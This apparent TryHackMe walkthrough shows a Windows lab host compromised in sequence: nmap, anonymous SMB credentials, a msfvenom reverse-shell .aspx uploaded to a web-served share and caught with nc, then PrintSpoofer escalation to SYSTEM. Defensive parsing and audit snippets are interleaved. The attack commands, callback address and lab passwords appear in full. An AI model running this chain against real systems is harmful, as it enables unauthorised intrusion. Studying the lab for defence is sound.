Port scanning.
All ports: -p-
Scan speed: -T4 (the second-fastest timing template, at the cost of generating many more packets)
On no response, retry twice: --max-retries=2
The results were saved to relevant_nmap_allport.txt.
http and smb (139, 445) are open, and three unknown ports are active.
$nmap -p- -T4 --max-retries=2 -oN relevant_nmap_allport.txt 10.10.43.248
Nmap scan report for 10.10.43.248
Host is up (0.30s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49663/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
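The SERVICE column in this report is a lookup in nmap's port table, not a probe: "unknown" on 49663, 49667 and 49669 only means those ports are not in that table (service detection with -sV was not run here). Parsing the report into structured data makes inventory checks such as "which open ports are outside this host's approved baseline" repeatable. The following Python is an added example, not part of the original writeup; the sample report is copied from the scan output above, and the baseline set used in the usage block is an assumption for illustration.

```python
import re
from dataclasses import dataclass

# Constructed sample: the port table from the nmap -oN report above, copied as shown on this page.
NMAP_REPORT = """\
Nmap scan report for 10.10.43.248
Host is up (0.30s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49663/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
"""

# A port-table row in nmap's normal output: "80/tcp open http" (a VERSION column may follow).
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


@dataclass(frozen=True)
class PortEntry:
    port: int
    proto: str
    state: str
    service: str   # name from nmap's port table, or "unknown" when the port is not in it


def parse_nmap_normal(report):
    """Parse every port row of an nmap -oN report; header and summary lines are skipped."""
    entries = []
    for line in report.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            entries.append(PortEntry(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return entries


def open_ports(entries):
    return [e.port for e in entries if e.state == "open"]


def unidentified_ports(entries):
    """Open ports whose service nmap could not name from its table (no -sV probe was run)."""
    return [e.port for e in entries if e.state == "open" and e.service == "unknown"]


def unexpected_ports(entries, baseline):
    """Inventory check: open ports that are not in the host's approved baseline set."""
    return sorted(set(open_ports(entries)) - set(baseline))


if __name__ == "__main__":
    scan = parse_nmap_normal(NMAP_REPORT)
    # Assumed baseline for this host: web, RPC, SMB and RDP are expected; the 49xxx ports are not.
    print("open:", open_ports(scan))
    print("unidentified:", unidentified_ports(scan))
    print("outside baseline:", unexpected_ports(scan, {80, 135, 139, 445, 3389}))
```

Ports reported as "unknown" are the ones worth a follow-up with -sV and a check against the host's change records; an ephemeral-range listener that duplicates a service already exposed on a well-known port, as 49663 turns out to do later on this page, is the kind of finding a baseline comparison surfaces immediately.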
First, I used smbclient -L to list the shares that exist on the target server.
$smbclient -L 10.10.43.248
Enter WORKGROUP\revi1337's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
nt4wrksv Disk
SMB1 disabled -- no workgroup available
I then checked whether each share allows anonymous connections; the "nt4wrksv" share allowed anonymous access, so I connected to it and downloaded passwords.txt locally.
$smbclient //10.10.43.248/nt4wrksv
Enter WORKGROUP\revi1337's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Aug 22 19:05:43 2022
.. D 0 Mon Aug 22 19:05:43 2022
passwords.txt A 98 Sun Jul 26 00:15:33 2020
7735807 blocks of size 4096. 5135667 blocks available
smb: \> get passwords.txt
getting file \passwords.txt of size 98 as passwords.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
Using a pipe (|), I passed the command output along as arguments, decoded the base64 values, and saved the result to user_pass.txt.
This yielded the IDs and passwords of Bob and Bill.
$cat passwords.txt | tail -2 | xargs -I argv bash -c '{ echo argv | base64 -d; }' > user_pass.txt
base64: invalid input
┌─[✗]─[revi1337@ParrotSec]─[~/Try-Hack_me/offensive_pentesting/advanced_exploitation/relevant]
└──╼ $cat user_pass.txt
Bob - !P@$$W0rD!123Bill - Juw4nnaM4n420696969!$$$
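The "base64: invalid input" message above is consistent with the file having CRLF line endings: the header and the two encoded lines (shown in full in the curl output further down this page) total 94 characters, and 94 plus two CRLF pairs with no final newline is exactly the 98 bytes that smbclient reported, so the first entry handed to base64 -d still carried a trailing carriage return. The decoder below is an added example, not the writeup's own command. It reconstructs passwords.txt from those two encoded lines (the CRLF layout is an inference from the size, not captured bytes), strips whitespace before strict decoding, and splits each entry into user and password; the naive_decode_fails helper reproduces the pipeline's failure on the unstripped line.

```python
import base64
import binascii

# Constructed reproduction of passwords.txt: the header and the two encoded lines shown on this
# page, with CRLF line endings and no trailing newline. That layout is 98 bytes, the size in the
# smbclient listing; the CRLF endings are an inference from that size, not captured bytes.
PASSWORDS_TXT = (
    b"[User Passwords - Encoded]\r\n"
    b"Qm9iIC0gIVBAJCRXMHJEITEyMw==\r\n"
    b"QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk"
)


def decode_entries(data):
    """Decode each 'user - password' entry into a (user, password) tuple.

    splitlines() accepts \\n, \\r\\n and \\r, and strip() removes any remaining whitespace,
    so a stray carriage return never reaches the strict base64 decoder.
    """
    results = []
    for raw in data.splitlines():
        line = raw.strip()
        if not line or line.startswith(b"["):   # blank line or the [header] line
            continue
        try:
            decoded = base64.b64decode(line, validate=True).decode("utf-8")
        except (binascii.Error, UnicodeDecodeError) as exc:
            raise ValueError(f"not a valid entry: {line!r}") from exc
        user, sep, password = decoded.partition(" - ")
        if not sep:
            raise ValueError(f"unexpected entry layout: {decoded!r}")
        results.append((user, password))
    return results


def naive_decode_fails(data):
    """Reproduce the shell pipeline's failure: splitting on '\\n' alone leaves the '\\r' on the
    first entry, and a strict decoder rejects that byte just as GNU base64 -d did."""
    first_entry = data.split(b"\n")[1]
    try:
        base64.b64decode(first_entry, validate=True)
    except binascii.Error:
        return True
    return False


if __name__ == "__main__":
    print("pipeline-style decode fails:", naive_decode_fails(PASSWORDS_TXT))
    for user, password in decode_entries(PASSWORDS_TXT):
        print(f"{user}: {password}")
```

The security point is unchanged by the decoding detail: base64 is an encoding, not protection, so a password list on an anonymously readable share is effectively in plaintext, and the decoder only matters for handling the Windows line endings cleanly.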
With the credentials obtained for Bob and Bill I also tried logging in over RDP and kept trying each of the shares, but could not get access at all. So I ran an nmap NSE vulnerability scan to see whether SMB had a known vulnerability.
Haha, it turned up the very commonly encountered EternalBlue vulnerability. Let's make use of it.
$sudo nmap -p 139,445 10.10.43.248 --script=smb-vuln* -oN relevant_smb_vuln.txt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-08-22 19:15 KST
Nmap scan report for 10.10.69.92
Host is up (0.30s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
Nmap done: 1 IP address (1 host up) scanned in 16.73 seconds
Since TryHackMe says not to use Metasploit, I searched for PoC code with searchsploit and tried to exploit the vulnerability, but
it kept failing, so I tried a different approach. (The room said not to use Metasploit and to leverage multiple vulnerabilities.)
$searchsploit ms17-010
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010) | windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit) | windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010) | windows_x86-64/remote/41987.py
------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
$searchsploit -m 41987
Exploit: Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)
URL: https://www.exploit-db.com/exploits/41987
Path: /usr/share/exploitdb/exploits/windows_x86-64/remote/41987.py
File Type: Python script, ASCII text executable, with very long lines
Copied to: /home/revi1337/Try-Hack_me/offensive_pentesting/advanced_exploitation/relevant/41987.py
Getting nowhere, after a lot of thought I went back to the three unknown ports from the very first full port scan. I had a rough hunch that port 80 (http) and the unknown port 49663 were running the same web server.
$ curl http://10.10.43.248
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#0072C6;
margin:0;
}
#container {
... (omitted)
$curl http://10.10.43.248:49663
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>IIS Windows Server</title>
<style type="text/css">
<!--
body {
color:#000000;
background-color:#0072C6;
margin:0;
}
#container {
... (omitted)
Since the responses on ports 80 and 49663 were identical, I figured that the SMB share could be reached through the web server on port 49663.
$curl http://10.10.43.248:49663 -v | tee 49663.txt
$curl http://10.10.43.248 -v | tee 80.txt
$diff 80.txt 49663.txt
Now let's look at the difference between the web server served on port 80 and the one served on port 49663.
On the regular port 80, the request for passwords.txt in the share returned 404, so it was not reachable there.
On port 49663, however, it returned 200, and the passwords.txt file I had downloaded locally earlier was present.
$curl http://10.10.43.248/nt4wrksv/passwords.txt -v
* Trying 10.10.43.248:80...
* Connected to 10.10.43.248 (10.10.43.248) port 80 (#0)
> GET /nt4wrksv/passwords.txt HTTP/1.1
> Host: 10.10.43.248
> User-Agent: curl/7.84.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 404 Not Found
< Server: Microsoft-IIS/10.0
< X-Powered-By: ASP.NET
< Date: Mon, 22 Aug 2022 11:17:26 GMT
< Content-Length: 0
<
* Connection #0 to host 10.10.43.248 left intact
$curl http://10.10.43.248:49663/nt4wrksv/passwords.txt -v
* Trying 10.10.43.248:49663...
* Connected to 10.10.43.248 (10.10.43.248) port 49663 (#0)
> GET /nt4wrksv/passwords.txt HTTP/1.1
> Host: 10.10.43.248:49663
> User-Agent: curl/7.84.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Content-Type: text/plain
< Last-Modified: Sat, 25 Jul 2020 15:15:33 GMT
< Accept-Ranges: bytes
< ETag: "65e151719662d61:0"
< Server: Microsoft-IIS/10.0
< X-Powered-By: ASP.NET
< Date: Mon, 22 Aug 2022 11:17:36 GMT
< Content-Length: 98
<
[User Passwords - Encoded]
Qm9iIC0gIVBAJCRXMHJEITEyMw==
* Connection #0 to host 10.10.43.248 left intact
QmlsbCAtIEp1dzRubmFNNG40MjA2OTY5NjkhJCQk
If a reverse shell is uploaded to the SMB share and then requested over the web, a shell can be established successfully.
I generated the reverse shell in aspx format with msfvenom; the extension is aspx because, as curl keeps showing, the web server is IIS.
$msfvenom -p windows/x64/shell_reverse_tcp lhost=10.11.71.183 lport=9999 -f aspx -o rvshell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of aspx file: 3413 bytes
Saved as: rvshell.aspx
$file rvshell.aspx
rvshell.aspx: HTML document, ASCII text
Somewhat out of the blue, I checked whether upload was allowed over HTTP; it was not, so I simply connected to the share again and uploaded the reverse shell there.
$curl -X OPTIONS http://10.10.43.248:49663/nt4wrksv/ -v
* Trying 10.10.43.248:49663...
* Connected to 10.10.43.248 (10.10.43.248) port 49663 (#0)
> OPTIONS /nt4wrksv/ HTTP/1.1
> Host: 10.10.43.248:49663
> User-Agent: curl/7.84.0
> Accept: */*
>
* Mark bundle as not supporting multiuse
< HTTP/1.1 200 OK
< Allow: OPTIONS, TRACE, GET, HEAD, POST
< Server: Microsoft-IIS/10.0
< Public: OPTIONS, TRACE, GET, HEAD, POST
< X-Powered-By: ASP.NET
< Date: Mon, 22 Aug 2022 11:27:13 GMT
< Content-Length: 0
<
* Connection #0 to host 10.10.43.248 left intact
$smbclient //10.10.43.248/nt4wrksv
Enter WORKGROUP\revi1337's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Sun Jul 26 06:46:04 2020
.. D 0 Sun Jul 26 06:46:04 2020
passwords.txt A 98 Sun Jul 26 00:15:33 2020
7735807 blocks of size 4096. 5137355 blocks available
smb: \> put rvshell.aspx
putting file rvshell.aspx as \rvshell.aspx (3.7 kb/s) (average 3.7 kb/s)
smb: \> ls
. D 0 Mon Aug 22 20:28:05 2022
.. D 0 Mon Aug 22 20:28:05 2022
passwords.txt A 98 Sun Jul 26 00:15:33 2020
rvshell.aspx A 3413 Mon Aug 22 20:28:06 2022
7735807 blocks of size 4096. 5137354 blocks available
smb: \>
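The root cause on this machine is a share that is both anonymously writable and mapped into the IIS document root (the shell prompt later on this page shows it at c:\inetpub\wwwroot\nt4wrksv), so any server-executable file written to it runs as the application pool. A defender who knows which shares are web-served can watch their listings for exactly that. The Python below is an added example, not code from the writeup: it parses smbclient's ls output (the sample listing is the one shown above), flags files whose extension IIS/ASP.NET executes rather than serves as data (the extension set is an assumed starting point), and lists files modified after a given timestamp.

```python
import os
import re
from datetime import datetime

# Constructed sample: the smbclient listing of nt4wrksv after the upload, as shown on this page.
SHARE_LISTING = """\
  .                                   D        0  Mon Aug 22 20:28:05 2022
  ..                                  D        0  Mon Aug 22 20:28:05 2022
  passwords.txt                       A       98  Sun Jul 26 00:15:33 2020
  rvshell.aspx                        A     3413  Mon Aug 22 20:28:06 2022

                7735807 blocks of size 4096. 5137354 blocks available
"""

# One smbclient 'ls' entry: name, DOS attribute letters (D, A, H, S, R, N ...), size, ctime-style date.
LISTING_LINE = re.compile(
    r"^\s*(?P<name>.+?)\s+(?P<attrs>[A-Z]*)\s+(?P<size>\d+)\s+"
    r"(?P<date>\w{3}\s+\w{3}\s+\d{1,2}\s+\d{2}:\d{2}:\d{2}\s+\d{4})\s*$"
)

# Extensions IIS/ASP.NET hands to a script handler instead of serving as data.
# Assumed starting set; extend it from the server's actual handler mappings.
SERVER_EXECUTABLE = {".asp", ".aspx", ".ashx", ".asmx"}


def parse_listing(text):
    """Turn smbclient 'ls' output into dicts; '.', '..' and the free-space footer are dropped."""
    entries = []
    for line in text.splitlines():
        m = LISTING_LINE.match(line)
        if not m or m.group("name") in (".", ".."):
            continue
        entries.append({
            "name": m.group("name"),
            "is_dir": "D" in m.group("attrs"),
            "size": int(m.group("size")),
            "mtime": datetime.strptime(" ".join(m.group("date").split()),
                                       "%a %b %d %H:%M:%S %Y"),
        })
    return entries


def flag_server_executables(entries, known_good=frozenset()):
    """Files in a web-served share that the web server would execute, minus an allow-list."""
    return [e["name"] for e in entries
            if not e["is_dir"]
            and os.path.splitext(e["name"])[1].lower() in SERVER_EXECUTABLE
            and e["name"] not in known_good]


def new_since(entries, since_iso):
    """Files modified after an ISO-8601 timestamp, e.g. the time of the last share review."""
    since = datetime.fromisoformat(since_iso)
    return [e["name"] for e in entries if not e["is_dir"] and e["mtime"] > since]


if __name__ == "__main__":
    listing = parse_listing(SHARE_LISTING)
    print("server-executable files:", flag_server_executables(listing))
    print("changed since 2022-08-01:", new_since(listing, "2022-08-01"))
```

The stronger fix is structural rather than a monitor: a share that needs to be world-writable should not live under the web root, and a directory the web server does serve should have script execution disabled for it, so that an uploaded .aspx is returned as text instead of run.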
With the upload done, wait locally for a connection coming in to 10.11.71.183,
$nc -s 10.11.71.183 -nlvp 9999
listening on [10.11.71.183] 9000 ...
then request the uploaded reverse shell file with curl,
$curl http://10.10.43.248:49663/nt4wrksv/rvshell.aspx
and the web server's shell attaches to nc. Privilege escalation is needed from here: the account IIS runs under has very low privileges, so Local Privilege Escalation is required.
$nc -s 10.11.71.183 -nlvp 9999
listening on [10.11.71.183] 9999 ...
connect to [10.11.71.183] from (UNKNOWN) [10.10.43.248] 49886
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>
If SeImpersonatePrivilege is among the privileges the IIS account currently holds, the PrintSpoofer.exe tool can be used to escalate to the SYSTEM account.
After downloading PrintSpoofer.exe from GitHub locally,
$wget https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe
--2022-08-22 21:48:21-- https://github.com/dievus/printspoofer/raw/master/PrintSpoofer.exe
Resolving github.com (github.com)... 20.200.245.247
Connecting to github.com (github.com)|20.200.245.247|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/dievus/printspoofer/master/PrintSpoofer.exe [following]
--2022-08-22 21:48:22-- https://raw.githubusercontent.com/dievus/printspoofer/master/PrintSpoofer.exe
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.108.133, 185.199.111.133, 185.199.110.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27136 (26K) [application/octet-stream]
Saving to: ‘PrintSpoofer.exe’
PrintSpoofer.exe 100%[=====================================================================================================>] 26.50K --.-KB/s in 0.008s
2022-08-22 21:48:23 (3.07 MB/s) - ‘PrintSpoofer.exe’ saved [27136/27136]
$file PrintSpoofer.exe
PrintSpoofer.exe: PE32+ executable (console) x86-64, for MS Windows
connect to the SMB share again and upload PrintSpoofer.exe.
$smbclient //10.10.93.17/nt4wrksv
smb: \> put PrintSpoofer.exe
putting file PrintSpoofer.exe as \PrintSpoofer.exe (22.2 kb/s) (average 14.3 kb/s)
Finally, running PrintSpoofer.exe performs the privilege escalation.
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer.exe -i -c cmd
PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
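The escalation above worked because the application-pool identity, despite its low privileges, holds SeImpersonatePrivilege (the "[+] Found privilege" line confirms it); auditing which service accounts hold that privilege is the matching defender check. The following Python is an added example, not part of the writeup. It parses `whoami /priv` output, which the page does not show; the sample table is a constructed example of that command's layout for an application-pool account, not captured output. Note that whoami reports a privilege as Disabled when the token holds it but it is not currently enabled, so the audit must key on presence, not only on the Enabled state.

```python
import re

# Constructed sample in the layout of `whoami /priv` for an IIS application-pool identity.
# The page only shows plain `whoami`; this table is an assumed example, not captured output.
WHOAMI_PRIV = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# One table row: privilege name, free-text description, then the State column.
PRIV_LINE = re.compile(r"^(Se\w+Privilege)\s+(.*?)\s+(Enabled|Disabled)\s*$")

# The privilege the escalation on this page depends on. Local policy may add others to this set.
WATCHED_PRIVS = {"SeImpersonatePrivilege"}


def parse_whoami_priv(text):
    """Map each privilege the token holds to its reported state ('Enabled' or 'Disabled')."""
    privs = {}
    for line in text.splitlines():
        m = PRIV_LINE.match(line.strip())
        if m:
            privs[m.group(1)] = m.group(3)
    return privs


def held_watched_privs(privs):
    """Watched privileges present in the token at all. 'Disabled' still means held: a process
    can enable a held privilege itself, so presence is what the audit keys on."""
    return sorted(p for p in privs if p in WATCHED_PRIVS)


def enabled_privs(privs):
    return sorted(p for p, state in privs.items() if state == "Enabled")


if __name__ == "__main__":
    token = parse_whoami_priv(WHOAMI_PRIV)
    print("held privileges:", len(token))
    print("enabled:", enabled_privs(token))
    print("watched privileges held:", held_watched_privs(token))
```

Run against the output of `whoami /priv` collected from each service account, this turns the page's "if SeImpersonatePrivilege is present" condition into an inventory item: any web-facing worker identity that shows up in held_watched_privs is one where a code-execution bug in the application becomes a path to SYSTEM, which is the argument for keeping such accounts off hosts that do not need the privilege and for patching and monitoring them first.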
Checking the User and Root flags.
C:\Users\Bob\Desktop>type user.txt
type user.txt
THM{fdk4ka34vk346ksxfr21tg789ktf45}
C:\Users\Administrator\Desktop>type root.txt
type root.txt
THM{1fk5kf469devly1gl320zafgl345pv}